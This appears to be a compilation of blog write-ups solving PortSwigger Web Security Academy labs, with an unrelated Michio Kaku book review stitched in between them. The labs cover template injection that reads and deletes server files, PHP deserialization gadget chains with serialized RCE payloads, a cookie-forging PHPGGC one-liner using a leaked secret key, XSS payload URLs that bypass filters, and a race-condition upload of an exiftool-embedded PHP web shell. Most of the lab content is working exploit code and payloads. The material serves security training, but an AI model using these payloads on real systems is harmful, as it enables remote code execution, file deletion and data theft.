            $this->rm($this->avatarLink);
        }

        if (!symlink($filename, $this->avatarLink)) {
            throw new Exception("Failed to write symlink " . $filename . " -> " . $this->avatarLink);
        }
    }

    public function delete() {
        $file = $this->user_dir . "/disabled";
        if (file_put_contents($file, "") === false) {
            throw new Exception("Could not write to " . $file);
        }
    }

    public function gdprDelete() {
        $this->rm(readlink($this->avatarLink));
        $this->rm($this->avatarLink);
        $this->delete();
    }

    private function rm($filename) {
        if (!unlink($filename)) {
            throw new Exception("Could not delete " . $filename);
        }
    }
}

?>

    

Do this same step to download avatar_upload.php, We are gathering as much info as we can now that may help us solve the lab:

      blog-post-author-display=user.setAvatar('/home/carlos/avatar_upload.php','image/jpeg')

    

We get this:

      <?php

require_once("./User.php");

if ($_FILES['avatar']['error'] !== 0) {
    throw new Exception("Error in file upload: " . $_FILES['avatar']['error']);
}

if (strpos($_FILES['avatar']['name'], "/") !== false || strpos($_FILES['avatar']['name'], ".") === false) {
    throw new Exception("Uploaded file name is invalid: " . $_FILES['avatar']['name']);
}

$file = "/tmp/" . $_FILES['avatar']['name'];
if (!move_uploaded_file($_FILES['avatar']['tmp_name'], $file)) {
    throw new Exception("Could not move uploaded file '" . $_FILES['avatar']['tmp_name'] . "' to '" . $file . "'");
}

$user = new User($_POST['user'], null, null, null);
$user->setAvatar($file, $_FILES['avatar']['type']);
header('Location: ./');

?>

    

Now check the codes of these two files that are used in file upload functionality, we find an interesting public method: gdprDelete(), It is used to delete an avatar image and its symbolic link, so this might be our answer, first we set our avatar image as follows, with the file that should be deleted:

      blog-post-author-display=user.setAvatar('/home/carlos/.ssh/id_rsa','image/jpeg')

    

Then we send this request and refresh the post page we had commented, then check if this file is set as our avatar image, right click and open it, it contains:

      Nothing to see here :)

    

So the file is set correctly as our avatar image, now we send the following payload using the function that we had found in User.php file, according to the code that we had downloaded, now this file and also the symbolic link that was made when setAvatar() function was called should be deleted, let’s see:

      blog-post-author-display=user.gdprDelete()

    

We send this request and refresh the post page that we had commented on to execute the payload and booom! The /home/carlos/.ssh/id_rsa file is deleted and the lab is solved!

Warning

Be careful with gdprDelete() method, if it is called after:

      blog-post-author-display=user.setAvatar('/home/carlos/User.php','image/jpeg')

    

or this:

      blog-post-author-display=user.setAvatar('/home/carlos/avatar_upload.php','image/jpeg')

    

These files are deleted from the server and since they have vital functionality for the server, we may inadvertently damage the server and may need to wait for 20 minutes for the lab server to reset.

Solution 2: Web Security Academy’s Solution

1. While proxying traffic through Burp, log in and post a comment on one of the blogs.

2. Go to the “My account” page. Notice that the functionality for setting a preferred name is vulnerable to server-side template injection, as we saw in a previous lab. You should also have noticed that you have access to the user object.

3. Investigate the custom avatar functionality. Notice that when you upload an invalid image, the error message discloses a method called user.setAvatar(). Also take note of the file path /home/carlos/User.php. You will need this later.

4. Upload a valid image as your avatar and load the page containing your test comment.

5. In Burp Repeater, open the POST request for changing your preferred name and use the blog-post-author-display parameter to set an arbitrary file as your avatar:

      user.setAvatar('/etc/passwd')

    

6. Load the page containing your test comment to render the template. Notice that the error message indicates that you need to provide an image MIME type as the second argument. Provide this argument and view the comment again to refresh the template:

      user.setAvatar('/etc/passwd','image/jpg')

    

7. To read the file, load the avatar using GET /avatar?avatar=wiener. This will return the contents of the /etc/passwd file, confirming that you have access to arbitrary files.

8. Repeat this process to read the PHP file that you noted down earlier:

      user.setAvatar('/home/carlos/User.php','image/jpg')

    

9. In the PHP file, Notice that you have access to the gdprDelete() function, which deletes the user’s avatar. You can combine this knowledge to delete Carlos’s file.

10. First set the target file as your avatar, then view the comment to execute the template:

      user.setAvatar('/home/carlos/.ssh/id_rsa','image/jpg')

    

11. Invoke the user.gdprDelete() method and view your comment again to solve the lab.

External Links

• Lab: Server-side template injection with a custom exploit

References

Lab Link

Lab: Developing a custom gadget chain for PHP deserialization

Lab Description

This lab uses a serialization-based session mechanism. By deploying a custom gadget chain, you can exploit its insecure deserialization to achieve remote code execution. To solve the lab, delete the morale.txt file from Carlos’s home directory.

You can log in to your own account using the following credentials: wiener:peter

Lab Hint

You can sometimes read source code by appending a tilde (~) to a filename to retrieve an editor-generated backup file.

Solutions

Solution 1: My Solution

We check the source of web pages and in all of them, there is a single line of code:

      <!-- TODO: Refactor once /cgi-bin/libs/CustomTemplate.php is updated -->

    

So we check this link in the browser, as the lab hint suggests, we can grab a copy of editor backup version of this file by adding a tilde(~) at the end of the file like this:

  https://YOUR-LAB-ID.web-security-academy.net/cgi-bin/libs/CustomTemplate.php~

So we get the following php code:

      <?php

class CustomTemplate {
    private $default_desc_type;
    private $desc;
    public $product;

    public function __construct($desc_type='HTML_DESC') {
        $this->desc = new Description();
        $this->default_desc_type = $desc_type;
        // Carlos thought this is cool, having a function called in two places... What a genius
        $this->build_product();
    }

    public function __sleep() {
        return ["default_desc_type", "desc"];
    }

    public function __wakeup() {
        $this->build_product();
    }

    private function build_product() {
        $this->product = new Product($this->default_desc_type, $this->desc);
    }
}

class Product {
    public $desc;

    public function __construct($default_desc_type, $desc) {
        $this->desc = $desc->$default_desc_type;
    }
}

class Description {
    public $HTML_DESC;
    public $TEXT_DESC;

    public function __construct() {
        // @Carlos, what were you thinking with these descriptions? Please refactor!
        $this->HTML_DESC = '<p>This product is <blink>SUPER</blink> cool in html</p>';
        $this->TEXT_DESC = 'This product is cool in text';
    }
}

class DefaultMap {
    private $callback;

    public function __construct($callback) {
        $this->callback = $callback;
    }

    public function __get($name) {
        return call_user_func($this->callback, $name);
    }
}

?>

    

So we might have a leak of some part the website code here. Also after we log in, we check the session cookie, and it turns out it is a serialized php object:

So we can check if this website is vulnerable to insecure deserialization.

For creating a custom gadget chain, we check the code we got above for kick-off(The first gadget in the chain that triggers the whole gadget chain) and sink gadgets(The last gadget in the chain that can execute our arbitrary code).

In this example, it seems that __wakeup() magic method might be suitable as the kick-off gadget. This method is executed when the php serialized object is going to be deserialized, in our case, it might execute our payload that we’re going to create. We follow the code, it finally leads to this line: $this->desc = $desc->$default_desc_type; in Product class constructor.

Also we search for a suitable sink gadget, the DefaultMap class has call_user_func which can execute arbitrary functions if we can somehow lead our input to this function. This function gets $this->callback as the first parameter and $name as the second, in this function, the first parameter is the name of an arbitrary php function and the second is the parameter passed to that function, this function is called in __get() magic method, this method is called when we call an undefined property of DefaultMap class and the called property name is passed to the second parameter which in our case is the command we are going to execute.

Also we can assign any value to $this->callback in the class constructor:

      public function __construct($callback) {
    $this->callback = $callback;
}

    

So for example we can have a remote code execution in a code similar to this:

      $test = new DefaultMap('passthru');
$command = 'rm /home/carlos/morale.txt';
$test->$command;

    

We assigned our arbitrary function name (passthru) to $this->callback by passing this value to the class constructor in the first line of code above. The passthru php function executes any command we send to it.

The Third line in the above code triggers the __get() method invocation of DefaultMap class which results in the following code being executed:

      return call_user_func($this->callback, $name);

    

$this->callback is passthru and $name is rm /home/carlos/morale.txt now which results in this file being removed from the server.

So the sink gadget and code is complete, now we need to somehow link the kick-off gadget to the sink gadget to execute these lines of codes.

If we review the leaked code, we can see that we have an object($this->desc) that can have the value of our first line above:

      $this->desc = new DefaultMap('passthru');

    

also we have a property($this->default_desc_type) that can have the value of our second line above:

      $this->default_desc_type = 'rm /home/carlos/morale.txt';

    

and if we follow the code, we arrive at the last part in Product class constructor that gets the above $this->desc and $this->default_desc_type values as parameters and assign them to $this->desc of its own:

      public function __construct($default_desc_type, $desc) {
    $this->desc = $desc->$default_desc_type;
}

    

which is exactly what we want and is the same as the third line of our code above: $test->$command; which results in our arbitrary code being executed.

I have prepared a php file for creating the final payload with just the parts of the leaked code that are necessary for creating the payload:

      <?php

class CustomTemplate {
    private $default_desc_type;
    private $desc;

    public function __construct() {
        $this->desc = new DefaultMap('passthru');
        $this->default_desc_type = 'rm /home/carlos/morale.txt';
    }
}

class DefaultMap {
    private $callback;

    public function __construct($callback) {
        $this->callback = $callback;
    }
}

$test = new CustomTemplate();
$ser = serialize($test);
echo($ser . "\n");
echo("===================================================\n");
echo("base64 endcoded then urlencoded: \n");
echo(urlencode(base64_encode($ser)) . "\n");

?>

    

and the output of this code is:

      O:14:"CustomTemplate":2:{s:33:"CustomTemplatedefault_desc_type";s:26:"rm /home/carlos/morale.txt";s:20:"CustomTemplatedesc";O:10:"DefaultMap":1:{s:20:"DefaultMapcallback";s:8:"passthru";}}
===================================================
base64 endcoded then urlencoded:
TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjI6e3M6MzM6IgBDdXN0b21UZW1wbGF0ZQBkZWZhdWx0X2Rlc2NfdHlwZSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO3M6MjA6IgBDdXN0b21UZW1wbGF0ZQBkZXNjIjtPOjEwOiJEZWZhdWx0TWFwIjoxOntzOjIwOiIARGVmYXVsdE1hcABjYWxsYmFjayI7czo4OiJwYXNzdGhydSI7fX0%3D

    

Keep in mind that the php serialized object is a binary format meaning it may contain some null characters… so if we copy-paste the cleartext part from the above output:

      O:14:"CustomTemplate":2:{s:33:"CustomTemplatedefault_desc_type";s:26:"rm /home/carlos/morale.txt";s:20:"CustomTemplatedesc";O:10:"DefaultMap":1:{s:20:"DefaultMapcallback";s:8:"passthru";}}

    

It won’t work, if we want to copy-paste the cleartext version, we need to edit it manually and the final payload will be something like this:

      O:14:"CustomTemplate":2:{s:17:"default_desc_type";s:26:"rm /home/carlos/morale.txt";s:4:"desc";O:10:"DefaultMap":1:{s:8:"callback";s:8:"passthru";}}

    

If we don’t want to edit the output and directly copy-paste the payload, as mentioned above we have to treat serialized php objects as binary format, as the serialize function help explains:

      Note that this is a binary string which may include null bytes, and needs to be stored and handled as such.
For example, **serialize()** output should generally be stored in a BLOB field in a database, 
rather than a CHAR or TEXT field.

    

That’s why we base64 and url encoded the output to easily be able to copy-paste it as the session cookie. So we copy this part from the output above:

      TzoxNDoiQ3VzdG9tVGVtcGxhdGUiOjI6e3M6MzM6IgBDdXN0b21UZW1wbGF0ZQBkZWZhdWx0X2Rlc2NfdHlwZSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO3M6MjA6IgBDdXN0b21UZW1wbGF0ZQBkZXNjIjtPOjEwOiJEZWZhdWx0TWFwIjoxOntzOjIwOiIARGVmYXVsdE1hcABjYWxsYmFjayI7czo4OiJwYXNzdGhydSI7fX0%3D

    

and paste it here in the session cookie in the Burp suite repeater:

and click apply and send, then boom! the carlos’s morale.txt file is removed from the server and the lab is solved!

Solution 2: Web Security Academy’s Solution

1. Log in to your own account and notice that the session cookie contains a serialized PHP object. Notice that the website references the file /cgi-bin/libs/CustomTemplate.php. Obtain the source code by submitting a request using the .php~ backup file extension.

2. In the source code, notice that the __wakeup() magic method for a CustomTemplate will create a new Product by referencing the default_desc_type and desc from the CustomTemplate.

3. Also notice that the DefaultMap class has the __get() magic method, which will be invoked if you try to read an attribute that doesn’t exist for this object. This magic method invokes call_user_func(), which will execute any function that is passed into it via the DefaultMap->callback attribute. The function will be executed on the $name, which is the non-existent attribute that was requested.

4. You can exploit this gadget chain to invoke exec(rm /home/carlos/morale.txt) by passing in a CustomTemplate object where:

   CustomTemplate->default_desc_type = "rm /home/carlos/morale.txt";
   CustomTemplate->desc = DefaultMap;
   DefaultMap->callback = "exec"
   

   If you follow the data flow in the source code, you will notice that this causes the Product constructor to try and fetch the default_desc_type from the DefaultMap object. As it doesn’t have this attribute, the __get() method will invoke the callback exec() method on the default_desc_type, which is set to our shell command.

5. To solve the lab, Base64 and URL-encode the following serialized object, and pass it into the website via your session cookie:

   O:14:"CustomTemplate":2:{s:17:"default_desc_type";s:26:"rm /home/carlos/morale.txt";s:4:"desc";O:10:"DefaultMap":1:{s:8:"callback";s:4:"exec";}}
   

External Links

• Lab: Developing a custom gadget chain for PHP deserialization

References

These are some Ruby examples equivalents of my previous post(about gadget chains in PHP), that show the process of finding gadget chains in Ruby programming language; also as mentioned in one of these articles, there may still be some undiscovered gadget chains for cybersecurity researchers to find.

Also there is a Web Security Academy lab to practice these types of documented gadget chains.

External Links

• RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN

• Universal Deserialisation Gadget for Ruby 2.x-3.x

References

This article explains clearly the process of finding a sample gadget chain and then writing a small code to build the payload for insecure deserialization exploitation in cases where there are no existing pre-built gadget chains.

External Links

• Insecure Deserialization - How to trace down a gadget chain

References

Learning Regex is easier than you think. You can use this tool to easily learn, practice, test and share Regex.

External Links

• Learn Regex step by step, from zero to advanced.

References

Amazon Description

#1 NEW YORK TIMES BEST SELLER • The epic story of the greatest quest in all of science—the holy grail of physics that would explain the creation of the universe—from renowned theoretical physicist and author of The Future of the Mind and The Future of Humanity

When Newton discovered the law of gravity, he unified the rules governing the heavens and the Earth. Since then, physicists have been placing new forces into ever-grander theories.

But perhaps the ultimate challenge is achieving a monumental synthesis of the two remaining theories—relativity and the quantum theory. This would be the crowning achievement of science, a profound merging of all the forces of nature into one beautiful, magnificent equation to unlock the deepest mysteries in science: What happened before the Big Bang? What lies on the other side of a black hole? Are there other universes and dimensions? Is time travel possible? Why are we here?

Kaku also explains the intense controversy swirling around this theory, with Nobel laureates taking opposite sides on this vital question. It is a captivating, gripping story; what’s at stake is nothing less than our conception of the universe.

Written with Kaku’s trademark enthusiasm and clarity, this epic and engaging journey is the story of The God Equation.

Editorial Reviews

Review

Praise for Michio Kaku’s The God Equation:

“This is an excellent book written by a masterful science communicator. . . . If there is anyone who can demystify the esoteric mathematics and physics of string theory, it is [Kaku]. And in this wonderful little book, that is precisely what he does—explain in clear and simple terms the conceptual breakthroughs, the blind alleys and the unanswered questions—in the search for a grand unified theory of everything. . . . The God Equation dazzles. . . . Kaku, a consummate storyteller, provides an engaging, unvarnished account. . . . His book presents cutting-edge ideas in theoretical physics, and primes readers to be ready when the next major breakthrough occurs.” —The Wall Street Journal

“[Kaku writes] about science in clean, concise language. . . . A clear and engaging story of a difficult scientific quest.” —Smithsonian Magazine

“Authoritative and accessible.” —Nature

“Kaku eloquently reviews the structure of our universe, highlighting contributions from intellectual giants and those continuing the daunting, decades-long quest for the elusive theory of everything. . . . Examining this tantalizing theory, Kaku outlines its promises, problems, and the breathtaking, almost inconceivable array of possibilities it presents. Kaku’s latest captures the awesome and mysterious beauty of the universe, of our planet, and of ourselves, and will intrigue anyone who ponders existence.” —Booklist

“Riveting. . . . Kaku’s expertise at making mind-bending concepts comprehensible makes this a real intellectual eye-opener.” —Publisher’s Weekly

“An expert account of the search for ‘the holy grail of physics.’ . . . Illuminating. . . . An important work.” —Kirkus Reviews

About the Author

MICHIO KAKU is a professor of theoretical physics at the City University of New York, co-founder of string field theory, and the author of several widely acclaimed science books, including Beyond Einstein, The Future of Humanity, The Future of the Mind, Hyperspace, Physics of the Future, and Physics of the Impossible. He is the science correspondent for CBS This Morning, the host of the radio programs Science Fantastic and Exploration, and a host of several science TV specials for the BBC and the Discovery and Science Channels.

Book Details

Author: Michio Kaku

Category: Relativity Physics, Quantum Theory

Publisher: Doubleday; First Edition (April 6, 2021)

Paperback: 240 pages

My Comment

This book was very interesting, I really enjoyed reading it, this is the latest Michio Kaku’s book about the quest for the “Theory of Everything”, probably the last and most important theory than can explain every physical law and question in our universe. Our universe is made of four fundamental forces: the weak and strong nuclear forces, the electromagnetic force and the gravitational force. The theory of everything, tries to unite these four forces into a formula, probably no longer than an inch long.

Einstein’s general relativity explains a part of the whole picture of the universe while The Standard Model explains the other part (the Standard Model unifies the three fundamental forces: strong, weak and electromagnetic, leaving the gravity out), so all the physical laws of the universe can, in principle, be derived from just one page of equations. The problem is that the two mentioned theories-Einstein’s relativity theory and the Standard Model-are based on different mathematics, different assumptions, and different fields. The ultimate goal is to merge these two sets of equations into a single, finite unified fashion. The key observation is that any theory claiming to be the theory of everything must contain both sets of equations, yet remain finite. So far, of all the various theories that have been proposed, the only theory that can do this is string theory.

It is a very interesting book that has a brief and simple introduction of scientific achievements in this path to the latest formula from Newton all to way to the latest Scientists that are working hard to achieve this greatest breakthrough in the history of Science that can answer many questions of ours.

References

Lab Link

Lab: Exploiting PHP deserialization with a pre-built gadget chain

Lab Description

This lab has a serialization-based session mechanism that uses a signed cookie. It also uses a common PHP framework. Although you don’t have source code access, you can still exploit this lab’s insecure deserialization using pre-built gadget chains.

To solve the lab, identify the target framework then use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, work out how to generate a valid signed cookie containing your malicious object. Finally, pass this into the website to delete the morale.txt file from Carlos’s home directory.

You can log in to your own account using the following credentials: wiener:peter

Solutions

Solution 1: My Solution

It is recommended to use Linux or a Unix-based operating system for using pre-built gadget chain tools like PHPGGC for PHP or Ysoserial for Java because of powerful bash command tools that are already in your arsenal or can be downloaded easily. So let’s begin.

At first, let’s get more information by browsing lab pages, when we log in with wiener:peter credentials, we see a session cookie in Burp like this:

      %7B%22token%22%3A%22Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ2a2xvbHZkNmw4bDIwN2dzMHd1Zms4bGR2bXc1NGV2cCI7fQ%3D%3D%22%2C%22sig_hmac_sha1%22%3A%22e14415c3060a4b056821d84317015c0d8e63b648%22%7D

    

It is a URL-encoded string, which when decoded in Burp decoder we get this:

      {"token":"Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ2a2xvbHZkNmw4bDIwN2dzMHd1Zms4bGR2bXc1NGV2cCI7fQ==","sig_hmac_sha1":"e14415c3060a4b056821d84317015c0d8e63b648"}

    

As you can see, it seems that the token part is signed with hmac_sha1 algorithm. Also the token part in this string is base64-encoded, when decoded it is:

      O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"vklolvd6l8l207gs0wufk8ldvmw54evp";}

    

It is a serialized PHP object. So we can test if there is any insecure deserialization vulnerability that we can exploit, Since it is a signed session cookie, if we want to edit this serialized object, we need the key for the hash algorithm to sign our payload value so we need to search for clues of the key used. When surfing lab pages, in the source of the website we can find this commented line:

      <!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->

    

so we use this link to open the phpinfo page, in this page we can find the secret key:

We test it to make sure this is the key that is used for signing the session cookie.

With this command you can sign a value:

      echo -n "value" | openssl sha1 -hmac "key"

    

We can test this:

      echo -n "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ2a2xvbHZkNmw4bDIwN2dzMHd1Zms4bGR2bXc1NGV2cCI7fQ==" | openssl sha1 -hmac "g8ffja92adxkuz3681mg16suuoo3sbxd"

    

When we run this code we get this signed value: e14415c3060a4b056821d84317015c0d8e63b648 and check it with the “sig_hmac_sha1” value in the decoded session cookie above and we see the values are matched, So we can use this secret key to hash our own serialized payload.

Also in the /cgi-bin/phpinfo.php page above we can see that the website is using Zend Engine:

Please pay attention not to confuse Zend engine with Zend Framework so we need to find out more clues about what PHP framework is used so that we can create an appropriate payload for it.

When the session cookie is manipulated in Burp repeater, an error page is returned in response and we get our clue in the error description:

      Internal Server Error: Symfony Version: 4.3.6

    

So the website is using Symfony framework for PHP. With all this information, we can create our final payload, we use PHPGGC tool to build our payload, first download this tool from its Github page.

Use this command to find related payloads for Symfony framework:

      ./phpggc -l symfony

    

We get this list:

We start from the first RCE command in the list and test to see which one is working.

We use the secret key found in our bash command, This bash command is created to do multiple tasks and create a final payload:

      command=$(./phpggc -f -b Symfony/RCE1 "rm /home/carlos/morale.txt");x=$( echo -n $command);y=$(echo -n $x | openssl sha1 -hmac "g8ffja92adxkuz3681mg16suuoo3sbxd" | cut -c 14-);urlencode '{"token":"'$x'","sig_hmac_sha1":"'$y'"}'

    

You can substitute your desired PHPGGC command in the above code and also your own secret key that you’ve found and get the resulting payload in the correct final format.

In the above command:

-n in echo command is to remove the trailing newline characters.

-b in phpggc is to base64 encode the gadget chain.

-f in phpggc is to fast destruct. Here is the description of this flag from PHPGGC Github page:

“PHPGGC implements a --fast-destruct (-f) flag, that will make sure your serialized object will be destroyed right after the unserialize() call, and not at the end of the script. I’d recommend using it for every __destruct vector, as it improves reliability. For instance, if PHP script raises an exception after the call, the __destruct method of your object might not be called. As it is processed at the same time as encoders, it needs to be set first.”

So it is recommended to use this flag.

cut -c 14- command cuts the resulting string because the result of the signed value of openssl command is something like:

      SHA1(stdin)= e14415c3060a4b056821d84317015c0d8e63b648

    

And we should begin at character 14 and remove the additional beginning characters of SHA1(stdin)=

So we get this final payload from the above command:

      %7B%22token%22%3A%22YToyOntpOjc7Tzo0MzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxBcGN1QWRhcHRlciI6Mzp7czo2NDoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcQWJzdHJhY3RBZGFwdGVyAG1lcmdlQnlMaWZldGltZSI7czo5OiJwcm9jX29wZW4iO3M6NTg6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXEFic3RyYWN0QWRhcHRlcgBuYW1lc3BhY2UiO2E6MDp7fXM6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXEFic3RyYWN0QWRhcHRlcgBkZWZlcnJlZCI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO31pOjc7aTo3O30%3D%22%2C%22sig_hmac_sha1%22%3A%22e6496d1876437637e6aca6a408cc1b7281bec1fd%22%7D

    

We replace this string with the session cookie in Burp repeater and Carlos’s morale.txt file is deleted and the lab is solved!

Solution 2: Web Security Academy’s Solution

1. Log in and send a request containing your session cookie to Burp Repeater. Highlight the cookie and look at the Inspector panel.

2. Notice that the cookie contains a Base64-encoded token, signed with a SHA-1 HMAC hash.

3. Copy the decoded cookie from the Inspector and paste it into Decoder.

4. In Decoder, highlight the token and then select Decode as > Base64. Notice that the token is actually a serialized PHP object.

5. In Burp Repeater, observe that if you try sending a request with a modified cookie, an exception is raised because the digital signature no longer matches. However, you should notice that:

• A developer comment discloses the location of a debug file at /cgi-bin/phpinfo.php.
• The error message reveals that the website is using the Symfony 4.3.6 framework.

6. Request the /cgi-bin/phpinfo.php file in Burp Repeater and observe that it leaks some key information about the website, including the SECRET_KEY environment variable. Save this key; you’ll need it to sign your exploit later.

7. Download the “PHPGGC” tool and execute the following command:

      ./phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' | base64

    

This will generate a Base64-encoded serialized object that exploits an RCE gadget chain in Symfony to delete Carlos’s morale.txt file.

8. You now need to construct a valid cookie containing this malicious object and sign it correctly using the secret key you obtained earlier. You can use the following PHP script to do this. Before running the script, you just need to make the following changes:

• Assign the object you generated in PHPGGC to the $object variable.
• Assign the secret key that you copied from the phpinfo.php file to the $secretKey variable.

      $object = "OBJECT-GENERATED-BY-PHPGGC";
$secretKey = "LEAKED-SECRET-KEY-FROM-PHPINFO.PHP";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;

    

This will output a valid, signed cookie to the console.

9. In Burp Repeater, replace your session cookie with the malicious one you just created, then send the request to solve the lab.

External Links

• Lab: Exploiting PHP deserialization with a pre-built gadget chain

References

See the first link below to become familiar with various Cross-site WebSocket hijacking (CSWSH) attacks.

If you are not familiar with Websocket vulnerabilities, take a look at the second link for more details.

External Links

• Cross-site WebSocket hijacking (CSWSH) — PortSwigger

• Testing for WebSockets security vulnerabilities — PortSwigger

References

Lab Link

Lab: Reflected XSS in a JavaScript URL with some characters blocked

Lab Description

This lab reflects your input in a JavaScript URL, but all is not as it seems. This initially seems like a trivial challenge; however, the application is blocking some characters in an attempt to prevent XSS attacks.

To solve the lab, perform a cross-site scripting attack that calls the alert function with the string 1337 contained somewhere in the alert message.

Solutions

Solution 1

Visit the following URL, replacing your-lab-id with your lab ID:

      https://your-lab-id.web-security-academy.net/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

    

The lab will be solved, but the alert will only be called if you click “Back to blog” at the bottom of the page.

The payload here, URL decoded is:

      &'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

    

The exploit uses exception handling to call the alert function with arguments. The throw statement is used, separated with a blank comment in order to get round the no spaces restriction. The alert function is assigned to the onerror exception handler.

As throw is a statement, it cannot be used as an expression. Instead, we need to use arrow functions to create a block so that the throw statement can be used. We then need to call this function, so we assign it to the toString property of window and trigger this by forcing a string conversion on window.

Here are some explanations about the Javascript code used above:

First of all, the code is using the comma operator. What the comma operator does is allow you to evaluate multiple expressions. In particular in this case, you have three:

         x=x=>{throw onerror=alert,1337},toString=x,window+''
// ^_____________________________^ ^________^ ^_______^
//                 1                     2         3

    

Let’s examine them one by one:

Brief Note about Implicit Globals

This is going to be relevant for most of the below sections, so I want to clear it up first. Any time you assign to any name you haven’t declared with var, let, or const it implicitly assigns to a property on the global object. In the browser, the global object is window, so any implicit globals go there.

An Arrow Function

      x=x=>{onerror=alert; throw 1337}

    

Definition

This will create a new arrow function and assign it to x. Since there is no variable declaration, x will be an implicit global and thus attached to window. This isn’t extremely useful, it’s likely done to save a few characters. The function also takes a single parameter called x but does nothing with it. Again, nothing useful, saves up a single character, otherwise it needs to be defined as ()=>.

Overriding toString

      toString=x

    

This part will override the toString method on window and change it to the x function. Thus any time you explicitly or implicitly convert window to a string, it will instead execute x.

      x = x => {
  onerror = alert;
  throw 1337
}

toString = x;

window.toString();

    

Converting window to String

In JavaScript, when you try to concatenate any value with a string, the value will be implicitly also be converted to a string. This is usually done by calling the toString() method.

The same thing happens in the last part of the code:

      window+''

    

This will:

1. trigger conversion to a string, which
2. calls the toString method on window, which
3. was overridden with x using toString=x, which
4. calls the x function instead, which
5. sets the global error handler to just be alert (onerror=alert) and immediately throws an error (throw 1337), which
6. invokes the global error handler

Why omitting window+'' doesn’t Throw an Error

Hopefully clear from the above, but to address it directly, that code is needed to set off the whole chain of reactions defined before it. Here is the full code with explanation and formatting for clarity:

      //create a function
window.x = x => {
  onerror = alert; //changes the global error handler
  throw 1337       //throws an error to trigger the error handler
};

//overwrite the `toString` method of `window` so it always throws an error
window.toString = window.x;

//implicitly call `window.toString()` by performing a string concatenation
window + '';

    

Solution 2

Another interesting solution is to use JavaScript without parentheses using DOMMatrix which is explained in detail by Gareth Heyes in a great post. To solve this lab with DOMMatrix payload, use:

      https://your-lab-id.web-security-academy.net/post?postId=5&%27},x=z=%3E{x=new/**/DOMMatrix;matrix=alert;x.a=1337;location='javascript'%2b':'%2bx},toString=x,window%2b%27%27,{x:%27

    

The payload in this code, URL decoded is:

      &'},x=z=>{x=new/**/DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x},toString=x,window+'',{x:'

    

As explained in Solution 1: /**/ is used to bypass space restriction, also click “Back to blog” link to pop alert message box and solve the lab.

External Links

• Lab: Reflected XSS in a JavaScript URL with some characters blocked

• Cross-site scripting (XSS) cheat sheet: Restricted characters

References

Lab Link

Lab: Web shell upload via race condition

Lab Description

This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

Lab Hint

The vulnerable code that introduces this race condition is as follows:

      <?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
    if($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?>

    

Solutions

Solution 1: My Solution

The main logic for me to solve this lab was to upload a suitable sized file(not small not that large) then because of this vulnerable code exposed in hint section, I knew that my PHP file would be on the server for a fraction of a second then the virus and extension check would be done on it then because it is a PHP file and not a JPG or PNG, it would be deleted, so I could use race condition to read the PHP file in a few milliseconds that the file exists on the server before deletion so: I used Burp Turbo Intruder for solving this lab to be able to send GET requests to read the PHP file as fast as I can. A simple code is used in Turbo Intruder for solving this lab:

      def queueRequests(target, wordlists):

    engine = RequestEngine(endpoint=target.endpoint,

                           concurrentConnections=80,

                           requestsPerConnection=1,

                           pipeline=False

                           )

    i = 0

    while i < 10000:

        engine.queue(target.req, None)

        i += 1


def handleResponse(req, interesting):

    # currently available attributes are req.status, req.wordcount, req.length and req.response

    if req.status != 404:

        table.add(req)

    

I set concurrentConnections=80 by trial and error, more was hindering the main upload request so I set to 80. Then I downloaded a random 500KB PNG file from the web and used exiftool to add this code to it and renamed it to a PHP file:

      exiftool -comment="<?php echo file_get_contents('/home/carlos/secret'); ?>" diamond.php

    

then because of a line of code in vulnerable code in hint:

      $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));

    

I changed the name of the file to the longest to increase the file processing (even for a few milliseconds) for strtolower function to maximum to save myself some time for race condition:

